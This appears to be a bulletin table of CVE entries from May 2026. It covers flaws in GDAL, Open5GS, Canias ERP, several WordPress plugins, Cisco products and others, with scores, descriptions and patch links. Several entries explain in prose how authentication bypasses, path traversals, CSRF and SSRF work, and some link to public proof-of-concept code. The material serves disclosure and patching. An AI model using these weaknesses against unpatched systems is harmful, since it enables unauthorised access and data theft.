| PicoTronica--e-Clinic Healthcare System ECHS | A vulnerability was detected in PicoTronica e-Clinic Healthcare System ECHS 5.7. The affected element is an unknown function of the file /cdemos/echs/api/v2/patient-records of the component API Endpoint. The manipulation results in missing authentication. The attack can be executed remotely. The exploit is now public and may be used. Upgrading to version 5.7.1 is sufficient to fix this issue. You should upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-06 | 5.3 | CVE-2026-8031 | VDB-361357 | PicoTronica e-Clinic Healthcare System ECHS API Endpoint patient-records missing authentication VDB-361357 | CTI Indicators (IOB, IOC, IOA) Submit #800781 | PicoTronica e-Clinic Healthcare System (ECHS) v5.7 Exposure of Private Personal Information to an Unauthorized Acto https://docs.google.com/document/d/1FByC9x21c5503cQg6lkxjffIwWlEAHtHi_83vk2eUdk/edit?usp=sharing |
| PicoTronica--e-Clinic Healthcare System ECHS | A vulnerability has been found in PicoTronica e-Clinic Healthcare System ECHS 5.7. This affects an unknown function of the file /cdemos/echs/api/v2/ of the component Response Header Handler. Such manipulation leads to information disclosure. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. Upgrading to version 5.7.1 mitigates this issue. It is suggested to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-06 | 5.3 | CVE-2026-8033 | VDB-361359 | PicoTronica e-Clinic Healthcare System ECHS Response Header v2 information disclosure VDB-361359 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800793 | PicoTronica e-Clinic Healthcare System (ECHS) v5.7 Information Disclosure https://docs.google.com/document/d/1dBJAAYyNpktnOBSCJPJGUMdfjb-Vj3PTy5oNj8RjeQ8/edit?usp=sharing |
| OSGeo--gdal | A vulnerability was identified in OSGeo gdal up to 3.13.0dev-4. This issue affects the function SWnentries of the file frmts/hdf4/hdf-eos/SWapi.c. Such manipulation of the argument DimensionName leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. Upgrading to version 3.12.4RC1 is capable of addressing this issue. The name of the patch is 9491e794f1757f08063ea2f7a274ad2994afa636. It is advisable to upgrade the affected component. | 2026-05-07 | 5.3 | CVE-2026-8086 | VDB-361839 | OSGeo gdal SWapi.c SWnentries heap-based overflow VDB-361839 | CTI Indicators (IOB, IOC, IOA) Submit #808038 | OSGeo GDAL 3.13.0dev Heap-based Buffer Overflow https://github.com/OSGeo/gdal/issues/14356 https://github.com/OSGeo/gdal/pull/14361 https://github.com/biniamf/pocs/tree/main/gdal-swinqdims_bof https://github.com/OSGeo/gdal/commit/9491e794f1757f08063ea2f7a274ad2994afa636 https://github.com/OSGeo/gdal/releases/tag/v3.12.4RC1 https://github.com/OSGeo/gdal/ |
| OSGeo--gdal | A security flaw has been discovered in OSGeo gdal up to 3.13.0dev-4. Impacted is the function GDnentries of the file frmts/hdf4/hdf-eos/GDapi.c. Performing a manipulation of the argument DataFieldName results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. Upgrading to version 3.13.0RC1 is recommended to address this issue. The patch is named 184f77dbcc74118c062c05e464c88161d3c37b9b. You should upgrade the affected component. | 2026-05-07 | 5.3 | CVE-2026-8087 | VDB-361840 | OSGeo gdal GDapi.c GDnentries heap-based overflow VDB-361840 | CTI Indicators (IOB, IOC, IOA) Submit #808039 | OSGeo GDAL 3.13.0dev Heap-based Buffer Overflow https://github.com/OSGeo/gdal/issues/14363 https://github.com/biniamf/pocs/tree/main/gdal-gdinqfields_bof https://github.com/OSGeo/gdal/commit/184f77dbcc74118c062c05e464c88161d3c37b9b https://github.com/OSGeo/gdal/releases/tag/v3.13.0RC1 https://github.com/OSGeo/gdal/ |
| gyoridavid--short-video-maker | A security flaw has been discovered in gyoridavid short-video-maker up to 1.3.4. This affects an unknown part of the file src/server/routers/rest.ts of the component REST API. The manipulation of the argument req.params.tmpFile results in path traversal. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-07 | 5.3 | CVE-2026-8115 | VDB-361903 | gyoridavid short-video-maker REST API rest.ts path traversal VDB-361903 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808258 | gyoridavid short-video-maker 1.3.4 Path Traversal https://github.com/gyoridavid/short-video-maker/issues/73 https://github.com/gyoridavid/short-video-maker/ |
| n/a--Open5GS | A vulnerability was detected in Open5GS up to 2.7.7. This affects the function ogs_sbi_client_send_via_scp_or_sepp in the library lib/sbi/client.c of the component NF. Performing a manipulation results in out-of-bounds read. The attack is possible to be carried out remotely. The patch is named d5bc487fcf9ea87d2b03f2ef95123af344773bfb. It is suggested to install a patch to address this issue. | 2026-05-09 | 5.3 | CVE-2026-8186 | VDB-362338 | Open5GS NF client.c ogs_sbi_client_send_via_scp_or_sepp out-of-bounds VDB-362338 | CTI Indicators (IOB, IOC, IOA) Submit #800024 | Open5GS 2.7.7 Out-of-bounds Read (CWE-125) / Denial of Service (CWE-400) https://github.com/open5gs/open5gs/issues/4491 https://github.com/open5gs/open5gs/pull/4496 https://github.com/open5gs/open5gs/commit/d5bc487fcf9ea87d2b03f2ef95123af344773bfb https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A flaw has been found in Open5GS up to 2.7.7. This impacts the function _gtpv1_u_recv_cb of the file src/upf/gtp-path.c of the component UPF. Executing a manipulation can lead to resource consumption. The attack may be performed from remote. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-09 | 5.3 | CVE-2026-8187 | VDB-362339 | Open5GS UPF gtp-path.c _gtpv1_u_recv_cb resource consumption VDB-362339 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #800025 | Open5GS 2.7.7 Denial of Service (DoS) (CWE-400) https://github.com/open5gs/open5gs/issues/4492 https://github.com/open5gs/open5gs/ |
| logtivity--Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity | The Activity Logs, User Activity Tracking, Multisite Activity Log from Logtivity plugin for WordPress is vulnerable to Authentication Bypass to Information Disclosure in versions up to, and including, 3.3.6. This is due to a logic flaw in the verifyAuthorization method where requests without an Authorization header skip Bearer token validation and fall through to an unconditional return true statement, bypassing all authentication checks. This makes it possible for unauthenticated attackers to access the /wp-json/logtivity/v1/options REST API endpoint and retrieve all plugin configuration options, including the logtivity_site_api_key which can be used to impersonate the site in API calls to the Logtivity service. | 2026-05-09 | 5.3 | CVE-2026-8198 | https://www.wordfence.com/threat-intel/vulnerabilities/id/65ca20b0-0831-4f60-9021-679be6c145ef?source=cve https://plugins.trac.wordpress.org/browser/logtivity/tags/3.3.7/Core/Services/Logtivity_Rest_Endpoints.php#L78 https://plugins.trac.wordpress.org/browser/logtivity/tags/3.3.7/Core/Services/Logtivity_Rest_Endpoints.php#L47 https://plugins.trac.wordpress.org/browser/logtivity/tags/3.3.6/Core/Services/Logtivity_Rest_Endpoints.php#L78 https://plugins.trac.wordpress.org/browser/logtivity/tags/3.3.6/Core/Services/Logtivity_Rest_Endpoints.php#L47 https://plugins.trac.wordpress.org/changeset/3507386/ |
| aandrew-me--tgpt | A security vulnerability has been detected in aandrew-me tgpt up to 2.11.1 on Linux/macOS. Affected by this vulnerability is the function helper.Update of the file helper.go of the component Update Handler. The manipulation leads to command injection. Local access is required to approach this attack. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-09 | 5.3 | CVE-2026-8210 | VDB-362418 | aandrew-me tgpt Update helper.go helper.Update command injection VDB-362418 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #803594 | aandrew-me tgpt v2.11.1 Command Injection https://drive.google.com/file/d/19wRsehbhotZXgE1TjenFtS3w-zRtp-PW/view?usp=sharing |
| OSGeo--gdal | A flaw has been found in OSGeo gdal up to 3.13.0dev-4. Affected by this vulnerability is the function SWSDfldsrch of the file frmts/hdf4/hdf-eos/SWapi.c. Executing a manipulation can lead to heap-based buffer overflow. The attack requires local access. The exploit has been published and may be used. Upgrading to version 3.13.0RC1 addresses this issue. This patch is called 3e04c0385630e4d42517046d9a4967dfccfeb7fd. The affected component should be upgraded. | 2026-05-09 | 5.3 | CVE-2026-8212 | VDB-362429 | OSGeo gdal SWapi.c SWSDfldsrch heap-based overflow VDB-362429 | CTI Indicators (IOB, IOC, IOA) Submit #808127 | OSGeo GDAL 3.13.0dev Out-of-Bounds Read https://github.com/OSGeo/gdal/issues/14398 https://github.com/biniamf/pocs/tree/main/gdal-swsdfldsrch_oob-read https://github.com/OSGeo/gdal/commit/3e04c0385630e4d42517046d9a4967dfccfeb7fd https://github.com/OSGeo/gdal/releases/tag/v3.13.0RC1 https://github.com/OSGeo/gdal/ |
| OSGeo--gdal | A vulnerability has been found in OSGeo gdal up to 3.13.0dev-4. Affected by this issue is the function GDSDfldsrch of the file frmts/hdf4/hdf-eos/GDapi.c of the component Grid File Handler. The manipulation leads to heap-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. Upgrading to version 3.13.0RC1 can resolve this issue. The identifier of the patch is 3e04c0385630e4d42517046d9a4967dfccfeb7fd. It is suggested to upgrade the affected component. | 2026-05-09 | 5.3 | CVE-2026-8213 | VDB-362430 | OSGeo gdal Grid File GDapi.c GDSDfldsrch heap-based overflow VDB-362430 | CTI Indicators (IOB, IOC, IOA) Submit #808128 | OSGeo GDAL 3.13.0dev Out-of-Bounds Read https://github.com/OSGeo/gdal/issues/14399 https://github.com/biniamf/pocs/tree/main/gdal-gdsdfldsrch_oob-read https://github.com/OSGeo/gdal/commit/3e04c0385630e4d42517046d9a4967dfccfeb7fd https://github.com/OSGeo/gdal/releases/tag/v3.13.0RC1 https://github.com/OSGeo/gdal/ |
| Industrial Application Software IAS--Canias ERP | A vulnerability was found in Industrial Application Software IAS Canias ERP 8.03. This affects the function doAction of the component RMI Interface. The manipulation of the argument sessionId results in improper authentication. It is possible to launch the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8214 | VDB-362431 | Industrial Application Software IAS Canias ERP RMI doAction improper authentication VDB-362431 | CTI Indicators (IOB, IOC, IOA) Submit #808238 | Industrial Application Software - IAS Canias ERP 8.03-- Information Disclosure https://hawktrace.com/blog/caniaserp/ https://gist.github.com/0xb1lal/3ef872a445310c5866d07d6a5b1803fa |
| Industrial Application Software IAS--Canias ERP | A vulnerability was determined in Industrial Application Software IAS Canias ERP 8.03. This vulnerability affects the function iasRequestFileEvent of the component RMI Interface. This manipulation of the argument m_strSourceFileName causes path traversal. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8215 | VDB-362432 | Industrial Application Software IAS Canias ERP RMI iasRequestFileEvent path traversal VDB-362432 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808242 | Industrial Application Software - IAS Canias ERP 8.03-- Directory traversal / Arbitrary file read https://hawktrace.com/blog/caniaserp/ https://gist.github.com/0xb1lal/3885c69998516685e3ea833403b9db2b |
| n/a--Open5GS | A vulnerability has been found in Open5GS up to 2.7.7. Affected is the function pcf_nbsf_management_handle_register of the file src/pcf/nbsf-handler.c of the component sm-policies Endpoint. Such manipulation leads to denial of service. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 5.3 | CVE-2026-8222 | VDB-362439 | Open5GS sm-policies Endpoint nbsf-handler.c pcf_nbsf_management_handle_register denial of service VDB-362439 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808427 | Open5gs PCF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4437 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was found in Open5GS up to 2.7.7. Affected by this vulnerability is the function pcf_sess_sbi_discover_and_send of the component sm-policies Endpoint. Performing a manipulation results in denial of service. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 5.3 | CVE-2026-8223 | VDB-362440 | Open5GS sm-policies Endpoint pcf_sess_sbi_discover_and_send denial of service VDB-362440 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808442 | Open5gs PCF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4438 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. Affected by this issue is the function pcf_sess_set_ipv6prefix of the file /src/pcf/context.c of the component PCF. Executing a manipulation of the argument SmPolicyContextData.ipv6AddressPrefix can lead to denial of service. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8224 | VDB-362441 | Open5GS PCF context.c pcf_sess_set_ipv6prefix denial of service VDB-362441 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808443 | Open5gs PCF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4439 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A vulnerability was identified in Open5GS up to 2.7.7. This affects the function pcf_npcf_smpolicycontrol_handle_delete of the file src/pcf/sm-sm.c of the component delete Endpoint. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 5.3 | CVE-2026-8225 | VDB-362442 | Open5GS delete Endpoint sm-sm.c pcf_npcf_smpolicycontrol_handle_delete denial of service VDB-362442 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808444 | Open5gs PCF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4440 https://github.com/open5gs/open5gs/ |
| n/a--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.7. This vulnerability affects the function ogs_pcc_rule_install_flow_from_media in the library /lib/proto/types.c. The manipulation results in denial of service. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-10 | 5.3 | CVE-2026-8226 | VDB-362443 | Open5GS types.c ogs_pcc_rule_install_flow_from_media denial of service VDB-362443 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808445 | Open5gs PCF v2.7.7 Denial of Service https://github.com/open5gs/open5gs/issues/4441 https://github.com/open5gs/open5gs/ |
| 8421bit--MiniClaw | A vulnerability was detected in 8421bit MiniClaw 0.8.0/0.9.0. This issue affects the function resolveSkillScriptPath of the file src/kernel.ts of the component System Command Handler. The manipulation results in os command injection. The exploit is now public and may be used. The patch is identified as 223c16a1088e138838dcbd18cd65a37c35ac5a84. It is best practice to apply a patch to resolve this issue. | 2026-05-10 | 5.5 | CVE-2026-8235 | VDB-362455 | 8421bit MiniClaw System kernel.ts resolveSkillScriptPath os command injection VDB-362455 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #809001 | 8421bit MiniClaw 0 OS Command Injection https://github.com/8421bit/MiniClaw/issues/6 https://github.com/8421bit/MiniClaw/pull/7 https://github.com/8421bit/MiniClaw/issues/6#issue-4290453729 https://github.com/8421bit/MiniClaw/commit/223c16a1088e138838dcbd18cd65a37c35ac5a84 https://github.com/8421bit/MiniClaw/ |
| Industrial Application Software IAS--Canias ERP | A vulnerability has been found in Industrial Application Software IAS Canias ERP 8.03. The affected element is the function iasGetServerInfoEvent of the component RMI Interface. Such manipulation leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8241 | VDB-362457 | Industrial Application Software IAS Canias ERP RMI iasGetServerInfoEvent improper authorization VDB-362457 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #808270 | Industrial Application Software - IAS Canias ERP 8.03-- Exposure of Sensitive Information to an Unauthorized Actor https://hawktrace.com/blog/caniaserp https://gist.github.com/0xb1lal/6f3f050f08cff569ecbde586e63c6bea |
| Industrial Application Software IAS--Canias ERP | A vulnerability was determined in Industrial Application Software IAS Canias ERP 8.03. This affects an unknown function of the component JNLP Deployment Endpoint. Executing a manipulation can lead to use of hard-coded cryptographic key . The attack may be performed from remote. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8243 | VDB-362459 | Industrial Application Software IAS Canias ERP JNLP Deployment Endpoint hard-coded key VDB-362459 | CTI Indicators (IOB, IOC, TTP) Submit #808296 | Industrial Application Software - IAS Canias ERP 8.03-- Use of Hard-coded Cryptographic Key (CWE-321) |
| Industrial Application Software IAS--Canias ERP | A vulnerability was identified in Industrial Application Software IAS Canias ERP 8.03. This impacts an unknown function of the component Login RMI Interface. The manipulation of the argument clientVersion leads to improper authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-10 | 5.3 | CVE-2026-8244 | VDB-362460 | Industrial Application Software IAS Canias ERP Login RMI improper authentication VDB-362460 | CTI Indicators (IOB, IOC, IOA) Submit #808326 | Industrial Application Software - IAS Canias ERP 8.03-- Improper Authentication (CWE-287), (CWE-200) https://gist.github.com/0xb1lal/758bbc5e4d82efea248e675da934ac69 |
| Opencart--OpenCart | OpenCart 3.0.3.7 contains a cross-site request forgery vulnerability that allows attackers to change user passwords by sending crafted requests to the account/password endpoint. Attackers can trick authenticated users into submitting hidden forms with new password values in the 'password' and 'confirm' parameters to hijack accounts. | 2026-05-10 | 4.3 | CVE-2021-47953 | ExploitDB-49970 VulnCheck Advisory: OpenCart 3.0.3.7 Cross-Site Request Forgery via account/password |
| curtain--Curtain | WordPress Plugin Curtain 1.0.2 contains a cross-site request forgery vulnerability that allows attackers to activate or deactivate site maintenance mode by crafting malicious requests. Attackers can trick authenticated administrators into submitting forged requests to the options-general.php page with curtain parameters to toggle maintenance mode without valid nonce validation. | 2026-05-10 | 4.3 | CVE-2022-50955 | ExploitDB-50842 Official Product Homepage VulnCheck Advisory: WordPress Plugin Curtain 1.0.2 Cross-site Request Forgery |
| HCL Software--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is vulnerable to insufficiently protected credentials for a short duration while communicating with a backend, internal application which could allow an attacker to potentially misuse them, if exfiltrated. . | 2026-05-06 | 4.8 | CVE-2025-31976 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL Software--BigFix Service Management (SM) | HCL BigFix Service Management (SM) does not adequately sanitize or safely render spreadsheet files (CSV, XLS, XLSX) before processing or distributing them. An attacker could populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content. | 2026-05-06 | 4.6 | CVE-2025-31978 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is affected by use of a vulnerable WSGI Server was identified. Deploying an outdated or insecure WSGI server may expose the application to known security weaknesses, potentially increasing the risk of exploitation and unauthorized access. | 2026-05-06 | 4.6 | CVE-2025-52613 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| timwhitlock--Loco Translate | The Loco Translate plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.8.2 via the `fsReference` AJAX route. This is due to the `findSourceFile()` method normalizing user-supplied `ref` paths containing `../` directory traversal sequences without validating that the resolved path remains within the intended bundle or content directory. This makes it possible for authenticated attackers, with Translator-level access and above (custom `loco_admin` capability required, granted to the `translator` role and administrators by default), to read arbitrary `.php`, `.js`, `.json`, and `.twig` files from the server filesystem outside the intended translation directory. Files named wp-config.php are excluded. | 2026-05-05 | 4.9 | CVE-2026-1921 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f9ff3058-a08c-40ed-b756-81e703b2277a?source=cve https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L12 https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L12 https://plugins.trac.wordpress.org/browser/loco-translate/tags/2.8.1/src/ajax/FsReferenceController.php#L92 https://plugins.trac.wordpress.org/browser/loco-translate/trunk/src/ajax/FsReferenceController.php#L92 https://plugins.trac.wordpress.org/changeset/3482475/loco-translate/trunk/tpl/admin/config/version.php https://plugins.trac.wordpress.org/changeset?old_path=%2Floco-translate/tags/2.8.2&new_path=%2Floco-translate/tags/2.8.3 |
| Cisco--Cisco Enterprise Chat and Email | A vulnerability in the Lite Agent feature of Cisco Enterprise Chat and Email (ECE) could allow an authenticated, remote attacker to conduct browser-based attacks. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Agent. This vulnerability is due to inadequate validation of file contents during file upload operations. An attacker could exploit this vulnerability by uploading a file that contains malicious scripts or HTML code, which the application could make available to other users to access. A successful exploit could allow the attacker to execute the contents of that file in the browser of a user and conduct browser-based attacks. | 2026-05-06 | 4.3 | CVE-2026-20172 | cisco-sa-ece-lite-agent-BCgSN8eb |
| Cisco--Cisco Prime Infrastructure | A vulnerability in the log file download functionality of Cisco Prime Infrastructure could allow an authenticated, remote attacker to download arbitrary log files from the server. This vulnerability is due to insufficient authorization checks on the download service API. An attacker could exploit this vulnerability by submitting a crafted URL request to an affected device. A successful exploit could allow the attacker to download sensitive log files that they would otherwise not have authorization to access. To exploit this vulnerability, the attacker must have valid credentials to access the web-based management interface of the affected device. | 2026-05-06 | 4.3 | CVE-2026-20189 | cisco-sa-pi-unauth-infodiscl-LFnLgmey |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in the RADIUS Policy API endpoints of Cisco ISE could allow an authenticated, remote attacker with read-only Administrator privileges to gain unauthorized access to sensitive information on an affected device. This vulnerability is due to improper role-based access control (RBAC) permissions on the RADIUS Policy API endpoints. An attacker could exploit this vulnerability by bypassing the web-based management interface and directly calling an affected endpoint. A successful exploit could allow the attacker to gain unauthorized read access to sensitive RADIUS Policy details that are restricted for their role. | 2026-05-06 | 4.3 | CVE-2026-20193 | cisco-sa-ise-unauth-bypass-uxjRXGpb |
| techjewel--Ninja Tables Easy Data Table Builder | The Ninja Tables - Easy Data Table Builder plugin for WordPress is vulnerable to unauthorized database table creation due to missing authorization checks on the `createFluentCartTable` function in all versions up to, and including, 5.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary Ninja Tables in the database which can lead to database pollution and resource exhaustion. | 2026-05-06 | 4.3 | CVE-2026-2306 | https://www.wordfence.com/threat-intel/vulnerabilities/id/592d42eb-4025-44af-a519-672656ad8b0e?source=cve https://plugins.trac.wordpress.org/browser/ninja-tables/trunk/app/Modules/FluentCart/Handlers/FluentCartHandler.php#L44 https://plugins.trac.wordpress.org/browser/ninja-tables/tags/5.2.6/app/Modules/FluentCart/Handlers/FluentCartHandler.php#L44 https://plugins.trac.wordpress.org/browser/ninja-tables/trunk/app/Modules/FluentCart/FluentCartModule.php#L23 https://plugins.trac.wordpress.org/browser/ninja-tables/tags/5.2.6/app/Modules/FluentCart/FluentCartModule.php#L23 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3453522%40ninja-tables%2Ftrunk&old=3447894%40ninja-tables%2Ftrunk&sfp_email=&sfph_mail= |
| PluginUs.Net--BEAR | Cross-Site Request Forgery (CSRF) vulnerability in PluginUs.Net BEAR allows Cross Site Request Forgery. This issue affects BEAR: from n/a through 1.1.5. | 2026-05-07 | 4.3 | CVE-2026-27415 | https://patchstack.com/database/wordpress/plugin/woo-bulk-editor/vulnerability/wordpress-bear-plugin-1-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Oracle Corporation--Oracle Macaron Tool of Oracle Open Source Projects | Vulnerability in the Oracle Macoron Tool product of Oracle Open Source Projects. The supported versions that is affected is v0.22.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Macaron Tool. Successful attacks of this vulnerability can result in Oracle Macaron Tool failing host address validation. | 2026-05-06 | 4.7 | CVE-2026-35253 | Oracle Advisory |
| wpeverest--User Registration & Membership Free & Paid Memberships, Subscriptions, Content Restriction, User Profile, Custom User Registration & Login Builder | The User Registration & Membership plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `embed_form_action()` function in all versions up to, and including, 5.1.4. This makes it possible for authenticated attackers, with Contributor-level access and above, to append shortcode content to arbitrary pages they do not own or have permission to edit. | 2026-05-05 | 4.3 | CVE-2026-3601 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c8798fb2-4cab-4960-9e32-fd74bb4a5091?source=cve https://plugins.trac.wordpress.org/browser/user-registration/trunk/includes/class-ur-ajax.php#L1003 https://plugins.trac.wordpress.org/browser/user-registration/tags/5.1.2/includes/class-ur-ajax.php#L1003 https://plugins.trac.wordpress.org/browser/user-registration/trunk/includes/admin/class-ur-admin-assets.php#L370 https://plugins.trac.wordpress.org/browser/user-registration/tags/5.1.2/includes/admin/class-ur-admin-assets.php#L370 https://plugins.trac.wordpress.org/changeset/3485702/user-registration/trunk/includes/class-ur-ajax.php?contextall=1 |
| Spring--Spring Cloud Config | When enabling trace logging in Spring Cloud Config Server sensitive information was placed in plain text in the logs. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater. | 2026-05-07 | 4.4 | CVE-2026-41004 | https://spring.io/security/cve-2026-41004 |
| go-git--go-git | go-git is an extensible git implementation library written in pure Go. Prior to versions 5.18.0 and 6.0.0-alpha.2, go-git may leak HTTP authentication credentials when following redirects during smart-HTTP clone and fetch operations. This issue has been patched in versions 5.18.0 and 6.0.0-alpha.2. | 2026-05-08 | 4.7 | CVE-2026-41506 | https://github.com/go-git/go-git/security/advisories/GHSA-3xc5-wrhm-f963 https://github.com/go-git/go-git/releases/tag/v5.18.0 https://github.com/go-git/go-git/releases/tag/v6.0.0-alpha.2 |
| WeblateOrg--weblate | Weblate is a web based localization tool. Prior to version 5.17.1, when a user changes their password, browser sessions are correctly invalidated via "cycle_session_keys()", but DRF API tokens ("wlu_*" prefix) stored in "authtoken_token" are not revoked. This issue has been patched in version 5.17.1. | 2026-05-07 | 4.2 | CVE-2026-41519 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-6j8j-4qp3-36p2 https://github.com/WeblateOrg/weblate/pull/19057 https://github.com/WeblateOrg/weblate/commit/649a2da81700542f95c0807b3c625fc3bb0eaf95 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.17.1 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the add mode in modules/documents-files.php accepts a name parameter validated only as 'string' type (HTML encoding), allowing path traversal characters (../) to pass through unfiltered. Combined with the absence of CSRF protection on this endpoint and SameSite=Lax session cookies, a low-privileged attacker can trick a documents administrator into clicking a crafted link that registers an arbitrary server file (e.g., install/config.php containing database credentials) into a documents folder accessible to the attacker. This issue has been patched in version 5.0.9. | 2026-05-07 | 4.5 | CVE-2026-41656 | https://github.com/Admidio/admidio/security/advisories/GHSA-m9h6-8pqm-xrhf https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, the contacts_data.php endpoint uses a weaker permission check (isAdministratorUsers(), requiring only rol_edit_user=true) than the frontend UI (contacts.php) which correctly requires the stronger isAdministrator() (requiring rol_administrator=true) and the contacts_show_all system setting. A user manager who is not a full administrator can directly request contacts_data.php?mem_show_filter=3 to retrieve all user records across all organizations in the Admidio instance, bypassing multi-tenant organization isolation. This issue has been patched in version 5.0.9. | 2026-05-07 | 4.9 | CVE-2026-41657 | https://github.com/Admidio/admidio/security/advisories/GHSA-g8p8-94f2-28gr https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| lxc--incus | Incus is a system container and virtual machine manager. Prior to version 7.0.0, uploads of large amount of data by authenticated users can run the Incus server out of disk space, potentially taking down the host system. The impact here is limited for anyone using storage.images_volume and storage.backups_volume as those users will have large uploads be stored on those volumes rather than directly on the host filesystem. This is the default behavior on IncusOS. This issue has been patched in version 7.0.0. | 2026-05-07 | 4.3 | CVE-2026-41685 | https://github.com/lxc/incus/security/advisories/GHSA-98vh-x9cx-9cfp https://github.com/lxc/incus/releases/tag/v7.0.0 |
| ellite--Wallos | Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.8.1, the SSRF protection in endpoints/subscription/add.php (line 42) and endpoints/payments/add.php (line 40) uses an inline IP validation check (FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) that does not block CGNAT addresses (100.64.0.0/10, RFC 6598). The includes/ssrf_helper.php file explicitly defines is_cgnat_ip() to cover this gap (used by notification endpoints), but the logo/icon URL fetching in subscription and payment endpoints performs its own inline validation that misses this range. This allows authenticated users to perform Blind SSRF to internal services in Tailscale, Carrier-Grade NAT, and other environments using 100.64.0.0/10 addresses. This issue has been patched in version 4.8.1. | 2026-05-07 | 4.3 | CVE-2026-41687 | https://github.com/ellite/Wallos/security/advisories/GHSA-4v59-hghw-7gc2 https://github.com/ellite/Wallos/commit/e79f28be6be0435fbc93563fb3c0e62206b48e85 https://github.com/ellite/Wallos/releases/tag/v4.8.1 |
